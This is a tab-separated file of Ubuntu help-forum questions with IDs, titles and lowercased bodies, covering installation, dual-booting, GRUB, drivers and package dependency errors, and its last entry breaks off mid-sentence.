316018	change keyboard shortcuts for codeblocks on ubuntu linux	on windows , the codeblocks keyboard shortcuts can be changed using a plugin . my guess is this plugin modifies a script or config file to store the modifications and assignments . i am guessing the linux version of codeblocks also has such a configuration file , even if there is no plugin to change the shortcuts using the gui . if there is such a file , where is it ? and if there is n't such a file , or it can not be `` easily '' modified by a human , then is it possible to change the keyboard shortcuts on for code : :blocks on linux ?
316019	how could i translate vlc into norwegian ( bokmaal ) ?	i want to contribute to the fabulous ubuntu world , but am a novice in technology and programming . but on the contrary , i am quite strong within my language norwegian ( bokmaal ) . ( norway is bilingual ) . and i have seen that vlc player is translated into norwegian ( nynorsk ) only , leaving the bokmaal language unavailable for this app . who can i talk to to translate vlc player to lang=nb ? i would love to do this job .
316020	firefox downloading torrents gives me no application to open them with - just opens download folder	when i download a torrent it asks me to choose an application to open it with but it shows none - even though i have deluge and qbittorrent installed . clicking on `` choose app '' takes me to the download folder - no apps there . why are no apps recognised ? and how do i find them ? ubuntu 12.04 on lenovo t500 with firefox browser .
316023	amarok does n't start after qt4-related ubuntu updates ( from raring-updates )	last monday i updated my ubuntu 13.04 and there were a bunch of qt4 related updates . ( i do n't know how to have a list of the updated packages which is n't taking a screenshot of ubuntu software center `` history '' tab and i ca n't yet attach pictures ) after this update amarok ( version 2.7.0-0ubuntu2.1 ) is not working anymore , after it starts i can see the main windows for less than a second and then it closes . running amarok from terminal i get the program 'amarok ' received an x window system error . this probably reflects a bug in the program . the error was 'badwindow ( invalid window parameter ) ' . ( details : serial 3099 error_code 3 request_code 20 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i had already experienced this problem after updating from the repository `` raring-proposed '' but i managed to revert that change and disabled that repository . unfortunately now the updates are from the raring-updates repo , and i would n't like to disable that ! am i the only one experiencing this problem ? i tried removing all the amarok and kde config files but it does n't help . thanks a lot in advance to anyone who 'd like to contribute .
316025	how to install wine	i am looking for a step by step instruction to guide me in the ways of installing , configuring and debugging many of the issues new users have when dealing with wine in ubuntu . what is the recommended way of installing wine , some of the issues that it has and how to solve them . if i have a specific problem with an app in wine , how do i go about solving it . what are the recommended steps to ensure that i can fix a problem related to an app i wish to use .
316027	find directories with lots of files in	so a client of mine got an email from linode today saying their server was causing linode 's backup service to blow up . why ? too many files . i laughed and then ran : # df -ih filesystem inodes iused ifree iuse % mounted on /dev/xvda 2.5m 2.4m 91k 97 % / crap . 2.4million inodes in use . what the hell has been going on ? ! i 've looked for the obvious suspects ( /var/ { log , cache } and the directory where all the sites are hosted from ) but i 'm not finding anything really suspicious . somewhere on this beast i 'm certain there 's a directory that contains a couple of million files . for context one my my busy servers uses 200k inodes and my desktop ( an old install with over 4tb of used storage ) is only just over a million . there is a problem . so my question is , how do i find where the problem is ? is there a du for inodes ?
316028	can i download ubuntu for my galaxy s lll fido ?	i dont like the google and all other apps i have with my phone . i need a os for my phone that i can surf the net , make calls , use a kind of openoffice app , have a contact list , etc . thank you .
316035	how can i install ubuntu 13.04 , preferably without creating a new partition on my 64 bit windows 8 uefi acer aspire e1-571 laptop ?	i realise this might be a duplicate i am asking because i ca n't find any questions so far that address this question but i would n't imagine it 'd be too rare . i accidentally deleted windows 8 last time i tried to install ubuntu on my laptop so i would like to be guided through this please . i love ubuntu , do n't mind windows 8 and it 'd be just great if they could coexist in peace and harmony on my laptop .
316045	12.04 : is it possible to close windows in `` spread mode '' ?	i had to switch back to 12.04 after using 13.04 for a few weeks . i use the spread view ( super+w ) in unity a lot , and i liked the possibility of closing unused windows . if i understand correctly , unity 7 will not be backported to 12.04 . is there another possiblity to have this function , maybe using ccsm ?
316050	icons disappear	i hava a problem . some icons from launcher disappear . i locked them but they have disappear again after boot . i do n't know what to do . i have ubutnu 12.04.2 lts which i have installed today and used update .
316051	ubuntu 13.04 weird partition shown in gparted	my ubuntu is a bit slow to boot so i started to look at partitions and with gparted i have found a weird format partition . here is a picture ! here is a picture of the gparted partitions ! explanations : ubuntu is inside dev/sda3 partition and the strange 3gb partition is inside the linux partition so i am wondering what it could be and if i can erase it safely . what about the unallocated spaces ? why are they there and could they slow down my system ? thanks a lot edit : i have found this thread where they suggest defragmenting with windows but since it is a partition inside the ubuntu partition i am wondering if it will do any good : http : //gparted-forum.surf4.info/viewtopic.php ? id=13447
316053	how to get ubuntu 10.04 live cd for 64 bit pc	can anybody give me a link for downloading ubuntu 10.04 live cd/dvd for 64 bit desktop pc
316065	reinstalling ubuntu beside win8	i have dualboot : ubuntu 12.04.2 and windows8 i want to reinsall ubuntu . what should i do ?
316067	restart network-manager every n minutes/hours	i have a problem with my ubuntu machine . every 15-20 mins my wifi stops working . the connection remains intact but internet access dies . whenever this happens - i restart network-manager and all is well for another 15 mins . what i would like to do is set up a cron job which does this for me . i have the following in my crontab ... */2 * * * * service network-manager restart ( it is 2 mins for debugging ) this does not work though . i read online that when doing things akin to this via cron , one needs to specify the full path ( which i do not know ) . can anyone help me with this problem ?
316068	high frequency app for the ubuntu smartphone	an app is considered for the ubuntu smartphone that involves : monitoring low voltage , compound analog wave forms with a peak frequency component of 4.4 mhz . uploading faithful digital equivalents in a cloud . downloading from the cloud processed digital equivalents . converting the stream of the digital equivalents into faithful , low voltage compound analog wave forms that include a peak frequency component of 4.4 mhz . my question is : can the ubuntu smartphone carry out all the above activities ? if not , then which of the above activities can it carry out ? i 'm looking forward to your comments .
316070	upgrade from 12.10 to 13.04 fails and apt does n't work properly	when trying to upgrade my release from 12.10 to 13.04 i get this output in terminal : axept @ axept-lifebook : ~ $ sudo do-release-upgrade ser etter ny utgave av ubuntu traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 144 , in < module > fetcher = get_fetcher ( options.frontend , m.new_dist , options.data_dir ) file `` /usr/bin/do-release-upgrade '' , line 37 , in get_fetcher from distupgrade.distupgradefetchercore import distupgradefetchercore file `` /usr/lib/python3/dist-packages/distupgrade/distupgradefetchercore.py '' , line 30 , in < module > import tempfile eoferror : eof read where not expected error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 12 , in < module > import subprocess , tempfile , os.path , re , pwd , grp , os eoferror : eof read where not expected original exception was : traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 144 , in < module > fetcher = get_fetcher ( options.frontend , m.new_dist , options.data_dir ) file `` /usr/bin/do-release-upgrade '' , line 37 , in get_fetcher from distupgrade.distupgradefetchercore import distupgradefetchercore file `` /usr/lib/python3/dist-packages/distupgrade/distupgradefetchercore.py '' , line 30 , in < module > import tempfile eoferror : eof read where not expected axept @ axept-lifebook : ~ $ and when running apt-cache info : axept @ axept-lifebook : ~ $ apt-cache policy ubuntu-release-upgrader-core ubuntu-release-upgrader-core : installert : 1:0.190.7 kandidat : 1:0.190.7 versjonstabell : *** 1:0.190.7 0 500 http : //no.archive.ubuntu.com/ubuntu/ quantal-updates/main amd64 packages 500 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ quantal-security/main amd64 packages 100 /var/lib/dpkg/status 1:0.190.1 0 500 http : //no.archive.ubuntu.com/ubuntu/ quantal/main amd64 packages and : sudo apt-get update & & sudo apt-get upgrade do n't do anything . all is up to date apparently.. trying to launch `` update manager '' gives the same error as `` do-release-upgrade '' . tried to remove .pyc files in /etc/apt/dist-packages/ and reinstalled python stuff as found in a bug-report ... any suggestion ? this install is not new , my laptop has been running fine for months without problems . btw , running `` software packages '' from `` system-settings '' does n't work . it wo n't start . suppose its the same reason.. its been slow to start before , but now it just wo n't start . update : get the same error when trying to add a repository from terminal.. whats going on ? ? ? ? ? ? update 2 : when `` update manager '' launch automatic with new system updates , it does n't work . nothing happens when i click `` install now '' button..
316072	broadcom bcm4313 on 13.04	i am a new ubuntu user and i do n't have much knowledge about linux . i recently installed ubuntu 13.04 x64 in my samsung sf310 laptop . everything works fine except for wireless adapter . i have been looking around for solutions and i must have tried everything i found , but with no success . i can tell you that i have a broadcom 4313 [ 14e4:4727 ] ( rev 01 ) adapter . if you need/want more info on my system , tell me how to get it and i 'll post it here . i have tried this with no success as well as virtually all other posts here . if anyone could please help me and give me some pointers , that would be great . output of rfkill list all : 0 : samsung-wlan : wireless lan soft blocked : no hard blocked : no 1 : samsung-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no output of lspci : 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) output of lshw : *-network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f4c00000-f4c03fff i 'm getting really frustrated ... it 's been 3 days trying to figure this out without getting anywhere ... everytime i try a new version of ubuntu ( or any other distro for that matter ) , i always have some kind of problem ... : (
316076	does installation cause exchanges ... ?	when i install ubutnu , does it cause change or something else in partition where is windows ?
316078	how do i gain access to the files in the /etc/apt folder ?	i need to do change a filename and copy a file to the folder /etc/apt , but the folder is locked . how do i unlock it ?
316084	what does the automatic login ?	under `` user accounts '' , there 's a toggle option labeled automatic login : what does that do if it 's tabbed to `` on '' ? i have n't tried the function yet and i 'd like advice from an expert .
316088	unmet dependencies in rhythmbox	i 've been having problems with rhythmbox , so i decided to uninstall and reinstall to see if it will work . i keep getting an error message during the installation that says some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : rhythmbox : depends : librhythmbox-core6 ( = 2.98-0ubuntu5 ) but 2.98+git20121010.c331b2df-0ubuntu1~12.04~ricotz0 is to be installed depends : rhythmbox-data ( = 2.98-0ubuntu5 ) but 2.98+git20121010.c331b2df-0ubuntu1~12.04~ricotz0 is to be installed depends : gir1.2-rb-3.0 ( = 2.98-0ubuntu5 ) but 2.98+git20121010.c331b2df-0ubuntu1~12.04~ricotz0 is to be installed recommends : rhythmbox-mozilla but it is not going to be installed recommends : rhythmbox-plugin-cdrecorder but it is not going to be installed recommends : rhythmbox-plugin-zeitgeist but it is not going to be installed recommends : rhythmbox-plugins but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i fix this ? output from sudo apt-cache rhythmbox rhythmbox : installed : ( none ) candidate : 2.98-0ubuntu5 version table : 2.98+git20121010.c331b2df-0ubuntu1~12.04~ricotz0 0 100 /var/lib/dpkg/status 2.98-0ubuntu5 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main i386 packages
316089	i ca n't find the file 'transmission ' on my computer with the search function	i went to download a torrent today and firefox asked me to choose an application to do so ( although the bit torrent files normally go to transmission per the permissions i 've set in firefox ) . i go to search for transmission and the search function just turns up music files with the letters 'tran ' in them . i 'm very frustrated . i literally ca n't find the path to a file that 's on my computer .
316097	the 13.04 installation freezes on 'choose language ' , what should i do ?	i am trying to install ubuntu 13.04 ( 64bit ) on a desktop with asus m5a88v-evo mb , but the installation process stucks when you choose the language and the ubuntu background appears . it just stay in that blue background . i have windows 7 64bit install , and i installed ubuntu on other pc without problem . also the same problem appears and when you try to run ubuntu without installation . i tried booting with dvd and usb
316100	problems replacing grub2	after windows ate my grub2 , i replaced it using the gui boot-repair method posted here : https : //help.ubuntu.com/community/boot-repair . i clicked the `` recommended method '' button and followed all the steps successfully . ubuntu 13 boots fine now , but i seem to remember there being more items in my grub2 list . there was memtest and maybe more ? those things were n't replaced .
316102	`` no installation candidate '' when trying to install build-essential	apt-get install build-essential fails with the following errors : ~ $ sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done package build-essential is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'build-essential ' has no installation candidate i had just run sudo apt-get update before trying this install . the folder /etc/apt/sources.list.d is empty . here 's the meat of /etc/apt/sources.list : $ grep deb\ http : /etc/apt/sources.list # ( with `` deb http : // '' deleted ) us.archive.ubuntu.com/ubuntu/ raring main restricted us.archive.ubuntu.com/ubuntu/ raring-updates main restricted us.archive.ubuntu.com/ubuntu/ raring universe us.archive.ubuntu.com/ubuntu/ raring-updates universe us.archive.ubuntu.com/ubuntu/ raring multiverse us.archive.ubuntu.com/ubuntu/ raring-updates multiverse us.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse security.ubuntu.com/ubuntu raring-security main restricted security.ubuntu.com/ubuntu raring-security universe security.ubuntu.com/ubuntu raring-security multiverse extras.ubuntu.com/ubuntu raring main this with ubuntu 13.04 64 bit . apt-cache policy build-essential build-essential : installed : ( none ) candidate : ( none ) version table : the directory /etc/apt/sources.list.d is empty .
316105	tor browser not opening	whenever i start tor in ubuntu 13.04 , the vidalia control panel opens , loads up and displays a status of `` connected to the tor network ! '' . however , the tor-infused firefox , does not pop up like it should . tor log : jul . 04 02:09:11.859 [ notice ] tor v0.2.3.25 ( git-17c24b3118224d65 ) running on linux . jul . 04 02:09:11.860 [ notice ] tor ca n't help you if you use it wrong ! learn how to be safe at https : //www.torproject.org/download/download # warning jul . 04 02:09:11.861 [ notice ] read configuration file `` /home/joren/.tor-browser/app/../data/tor/torrc '' . jul . 04 02:09:11.872 [ notice ] initialized libevent version 2.0.21-stable using method epoll ( with changelist ) . good . jul . 04 02:09:11.873 [ notice ] opening socks listener on 127.0.0.1:9150 jul . 04 02:09:11.873 [ notice ] opening control listener on 127.0.0.1:9151 jul . 04 02:09:11.937 [ notice ] parsing geoip file ./data/tor/geoip . jul . 04 02:09:12.178 [ notice ] no aes engine found ; using aes_* functions . jul . 04 02:09:12.178 [ notice ] this openssl has a good implementation of counter mode ; using it . jul . 04 02:09:12.235 [ notice ] openssl openssl 1.0.0k 5 feb 2013 looks like version 0.9.8m or later ; i will try ssl_op to enable renegotiation jul . 04 02:09:12.740 [ notice ] reloaded microdescriptor cache . found 8497 descriptors . jul . 04 02:09:12.740 [ notice ] i learned some more directory information , but not enough to build a circuit : we have no usable consensus . jul . 04 02:09:13.758 [ notice ] bootstrapped 5 % : connecting to directory server . jul . 04 02:09:13.761 [ notice ] heartbeat : tor 's uptime is 0:00 hours , with 1 circuits open . i 've sent 0 kb and received 0 kb . jul . 04 02:09:13.908 [ notice ] bootstrapped 10 % : finishing handshake with directory server . jul . 04 02:09:14.252 [ notice ] bootstrapped 15 % : establishing an encrypted directory connection . jul . 04 02:09:14.507 [ notice ] bootstrapped 20 % : asking for networkstatus consensus . jul . 04 02:09:14.615 [ notice ] bootstrapped 25 % : loading networkstatus consensus . jul . 04 02:09:16.446 [ notice ] we 'd like to launch a circuit to handle a connection , but we already have 32 general-purpose client circuits pending . waiting until some finish . jul . 04 02:09:16.447 [ notice ] bootstrapped 45 % : asking for relay descriptors . jul . 04 02:09:16.448 [ notice ] i learned some more directory information , but not enough to build a circuit : we have only 113/3851 usable microdescriptors . jul . 04 02:09:17.755 [ notice ] we now have enough directory information to build circuits . jul . 04 02:09:17.755 [ notice ] bootstrapped 80 % : connecting to the tor network . jul . 04 02:09:17.810 [ notice ] bootstrapped 85 % : finishing handshake with first hop . jul . 04 02:09:17.818 [ notice ] bootstrapped 90 % : establishing a tor circuit . jul . 04 02:09:18.156 [ notice ] tor has successfully opened a circuit . looks like client functionality is working . jul . 04 02:09:18.157 [ notice ] bootstrapped 100 % : done . how do i proceed solving this issue ?
316110	how do i fix a fatal error at installation ?	i tried reinstalling 12.04lts x64 to my laptop and the grub boot loader is giving me a fatal error at installation . error : executing 'grub-install /dev/sda ' failed
316111	two questions 1.can i just burn the main ubuntu download to a usb and another which is long er in the thread	my other is this i installed ubuntu alongside win 7 didnt give much didsk space so booted from my gparted live cd and increased the partion being n i bootes up my computer warning and did and when i booted up my computer i got to grub rescue but i had cd just in case so i tried to load the linux partion but i would n't go but win7 works fine so i want my disk space back so can i just delete the partition and increase my main partion or can i delete it and re install ubuntu
316112	how to put arch independent files into separated .deb package ?	when you build a deb how do you make it so arch independent data such as plugin files to be packaged into a separated .deb ?
316117	search and replace similar but different phrases	how do i search and replace a common , but different , phrase to a single phrase in multiple files from the terminal . for instance , i want to change the following : file1 , file2 , file3 : -- link2 -- -- link2 -- -- link2 -- -- link3 -- -- link3 -- -- link3 -- -- link4 -- -- link4 -- -- link4 -- all to -- link1 --
316118	13.04 webapps not working	just installed chromium and unity-chromium-extension . now after a reboot , i get the option from gmail to install the webapp . i accept , however from then on nothing happens - a search for gmail in the dash gives nothing and there is nothing new in the messaging indicator . perhaps i am experiencing a bug , but i 'd like to be sure that i am not overlooking anything before i come to that . so please give me a hand with this , it 's my first time actually looking into this feature . cheers !
316122	classpath unsets after restarting	i have followed the steps illustrated in this link http : //www.tutorialspoint.com/java/java_packages.htm but after i restart my system ( ubuntu 12.10 ) the classpath unsets itself . how can i make it more permanent ?
316128	grub questions , image background , version and grub customizer program	ubuntu 12.04 first of what exactly is my grub version ? do i have grub2 ? my grub -v command says : 1.99-21ubuntu3.9 and when i tried to update it said i had most recent . anyway i want to change the background image of my grub screen , i 've tried everything , it 's in the folder , i 've tried grub customizer , nothing works . the image is in the right dimensions is it the file size ? it 's like 400kb ... anyone have experience with this program ?
316132	how to use drivers saved on external hard drive	i have a file saved on an external hard drive which i am trying to install on ubuntu 13.04 , im quite new so dont know how to do this the file is named broadcom-wl-4.150.10.5.tar.bz2 i have already opened the file to see whats in there but as im used to the windows operating system , i cant really understand it , so i dont know how to proceed from here . in case this is the wrong file i additionally added to the hard drive another file named hybrid-portsrc_x86_32-v5_100_82_112.tar.gz this is unlike windows operating system so forgive me for feeling alienated about how to install these on to ubuntu ! would someone please be able to instruct me on what to do and which one of these packages i should install ? and again , sorry for any duplicated questions
316133	cant format pen drive showing write protected	i want to remove write protected from pen drive or just i want to format it but i 'm un able to do . sudo mkfs -t vfat /dev/sdb1 mkfs.vfat 3.0.14 ( 23 jan 2023 ) mkfs.vfat : unable to open /dev/sdb1 : read-only file system this is the error while formating please help me out
316139	huawei e1731 not getting detected in ubuntu 13.04	i got a new airtel data card with huawei e1731 firmware . my laptop is dell inspiron 14 . when i plugged in the device into my laptop , it is not even detecting that device as an usb . i went into /media directory , and i found that it is empty . i have a set of installation files in my data card 's usb storage which could run the configurations . i am posting this question after trying all the options mentioned in this forum like using network manager , using wvdial etc . i was not able to execute apt-get usb-modeswitch as i do n't have any internet available for that laptop . regards , renga
316140	ca n't find ssl_crtd ( squid3 ? )	needed to prepare cert cache for ssl bumping . what package is this in ? i 'm using the 3.3.4-1~precise1~ppa1 version from ppa : dirk-computer42/c42-backport because of bug # 1175049. but it does n't appear to be in the main versin ( squid3_3.1.19-1ubuntu3.12.04.2_amd64.deb ) either ( nor squid3-common ) .
316141	problem in running uget	when i ( try to ) run uget in ubuntu 13.04 i get this error : user-pc : ~ $ uget-gtk fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . segmentation fault ( core dumped ) how can i solve this problem ?
316147	is it normal for ubuntu to take a long time to shut down after running the boot-repair program ?	several months ago , i installed lubuntu alongside windows 7 on my laptop . i decided to uninstall lubuntu and install linux mint , and so i used easybcd to write the mbr for windows 7/windows vista and boot directly into windows 7 at startup . i then deleted the 2 volumes which contained the data for my lubuntu installation ( which i originally created by partitioning my second hard drive ) , deleted the partition , and i extended my second hard drive with the free partition . this process had worked for me when i was uninstalling lubuntu from another laptop several months ago , and i was sure this would work again without any hitches . when i restarted my computer , however , i ran into a missing device error with grub . i did n't really know how to fix it , so i used a liveusb of ubuntu in order to use the boot-repair tool ( by running the try ubuntu option and downloading boot-repair ) to regain access to windows . i ran it , and it said that the boot was successfully repaired and it was safe to reboot . i did as such , but ubuntu took a long time to shutdown , so i thought it must have been some error and i did a force shutdown . after turning on the laptop , it said that bootmgr was missing , and the only option given was to restart the computer , and after restarting 5 times , it still said the same message . i used the liveusb again to run the boot-repair tool to repair the boot , and i am currently waiting on ubuntu to reboot . is it normal for ubuntu to take this long to reboot , or is this an error ? here is the paste from the boot-repair if it is of any help : http : //paste.ubuntu.com/5842294/ i 'm sorry if i left any information out , and i 'll try my best to provide any information about the problem if needed .
316158	trying to switch from win7 to ubuntu but boot disc wo n't work	okay , i have win7 ultimate on a machines , and i want to put ubuntu 12.4 on it instead . i made a boot disc , flipped my boot order to cd first in my bios . it gets a little ways in to post , and says `` booting from cd ... '' then it just starts windows anyway without doing any unbuntu boot stuff at all . but it does n't boot right to windows , it boots to a 'windows has failed to properly load , enter start repair or start windows normally screen . anyone have any idea how i can make this work ?
316167	unity 7 ubuntu 13.04 default behaviour when click on icon run application and move to the workspace that contains this runned app	in 12.04 this is a default behaviour . when i upgraded to 13.04 that does not occur . when i launch one instance of any example application and switch to other desktop ( fro example from up-left to down-right workspace ) via super+s keyboard and then want to see my runned app unity do n't switch my workspace to workspace that contain my app . why this is by default ? how can i change this behavior ? thank you very much !
316168	how to increase resolution in ubuntu 12.04 lts to 1280x800 if it is not found in available modes ?	i have a problem with my screen resolution - it 's native is 1280x800 but i can get only two resolutions ( from xrandr commend ) : joanna @ joanna-m51se : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 i 've tried to add this resolution using cvt commend ( this is what i get ) : joanna @ joanna-m51se : ~ $ cvt 1280 800 1280x800 59.81 hz ( cvt 1.02ma ) hsync : 49.70 khz ; pclk : 83.50 mhz modeline `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync i 've tried each advise i found on the web but nothing solves the problem . i am using a laptop : video card : ati mobility radeon hd 3470 screen ( matrix ? ) : samsung ltn154x3-l03 can anybody help me ?
316169	in 'sudo gedit ' i can not use ctrl space to activate fcitx input method	in 'sudo gedit ' i can not use ctrl space to activate fcitx input method . i can activate fcitx with ctrl space as normal user . i use ubuntu12.04.2 amd64 arch . how to do with it ? thanks
316171	how to install ubuntu with windows 8 ?	i am using windows 8.i wanted to install ubuntu alongside with windows . i can install with windows 7 but not windows 8..please guide me
316177	how to completely remove an os from virtualbox ?	i have installed windows xp in my virtualbox some days ago . now , i want to remove windows xp completely from virtualbox and i decided to install ubuntu 13.04 for testing . what is the correct way to remove completely windows xp from virtualbox ?
316180	cant find previously stored data on the hard disk	i installed ubuntu 12.04 lts and it was a piece of cake . the problem though is that i 'm unable to see my previously stored data . it was not formatted during installation , i just upgraded it and it said it would keep all my files intact . can u help me to restore them or view them or at least free my disk space by wiping them off . there are no partitions or any other os other than ubuntu , its a 120 gb hard disk and before installation the free space was around 45gb or so and now its showing as 39gb and i 'm unable to access the data . kindly help & thanks in advance
316184	whether hp pavilion g6-2007tx supports ubuntu ?	sir , i am having hp pavilion g6-2007tx lapto . the laptop is provided with windows 8 . i need to replace the os with ubuntu 12.10 . i need to know , whether my laptop will support ubuntu or not . i am also having some 10-20 gb of important data , and i dont want it to be lost . requirement / expectations : drivers for amd drivers , dolby sound available . bluetooth drivers , wifi drivers , lan drivers , touchpad drivers and webcam drivers to be available . it should be able to manage heating i.e . temperature regulations . hp provides cool sense technology for windows . i suppose ubuntu might have some app/ppas for such things . here are the complete specifications/configurations :
316187	not able to view images in w3m	i was playing around with w3m ( command-line browser ) , and found that it was not able to display images when run from terminator or gnome-terminal . but , when run from xterm , it is able to display images . i have both w3m and w3m-img packages installed . after searching around a bit , i found some references about enabling frame buffer and stuff and could n't quite understand all the terminology . what should i do to make terminator run w3m properly with image preview support ?
316189	broken dependencies after upgrade	after an apt-get upgrade i got the following error : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python3.3-minimal ( 3.3.1-1ubuntu5 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.1-1ubuntu5 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : python3.3-minimal python3.3 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and i ca n't turn off my computer ... i guess i did not install correctly python 3.3 , but how can i repair it ? edit : i tried apt-get -- reinstall install python2 python2-support but i got : the same error edit : more information on my system : linux mycomputer 3.5.0-34-generic # 55-ubuntu smp thu jun 6 20:20:19 utc 2013 i686 i686 i686 gnu/linux dpkg -- print-architecture i386 i used to have ubuntu 12.10 . my problem occured when i tried upgrading it to 13.04 . i had a error message telling me the process stoped because there were too many errors . i then tried to run sudo apt-get update & & sudo apt-get upgrade but encountered the error above . i had a similar problem a few months ago when i mistakenly deleted python2 from my computer . i then could not turn off my computer by clicking on the icon ( it does not respond ) and turning off . the only way was to force it to shut down manually . when i turned it on again , i just had an empty desktop and could not do anything . this was fixed by reinstalling the whole system . searching on the internet , i tried several commands : sudo dpkg -- configure -a which resulted in setting up python3.3-minimal ( 3.3.1-1ubuntu5 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3-minimal : python3-minimal depends on python3.3-minimal ( > = 3.3.1-1~ ) ; however : package python3.3-minimal is not configured yet . sudo apt-get -- reinstall install python3 python3-support reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python3-support sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up python3.3-minimal ( 3.3.1-1ubuntu5 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3-minimal : python3-minimal depends on python3.3-minimal ( > = 3.3.1-1~ ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3-minimal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.1-1ubuntu5 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3 : python3 depends on python3.3 ( > = 3.3.1-1~ ) ; however : package python3.3 is not configured yet . python3 depends on python3-minimal ( = 3.3.1-0ubuntu1 ) ; however : package python3-minimal is not configured yet . dpkg : error processing python3 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python3.3-minimal python3-minimal python3.3 python3 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg : error processing python3-minimal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3 : python3 depends on python3-minimal ( = 3.3.1-0ubuntu1 ) ; however : package python3-minimal is not configured yet . dpkg : error processing python3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.1-1ubuntu5 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python3.3-minimal python3-minimal python3 python3.3 python -- version returns python 2.7.4 doing : cd /tmp sudo apt-get download python3 sudo dpkg -i python3*.deb & & apt-get dist-upgrade returns ( reading database ... 374310 files and directories currently installed . ) preparing to replace python3 3.3.1-0ubuntu1 ( using 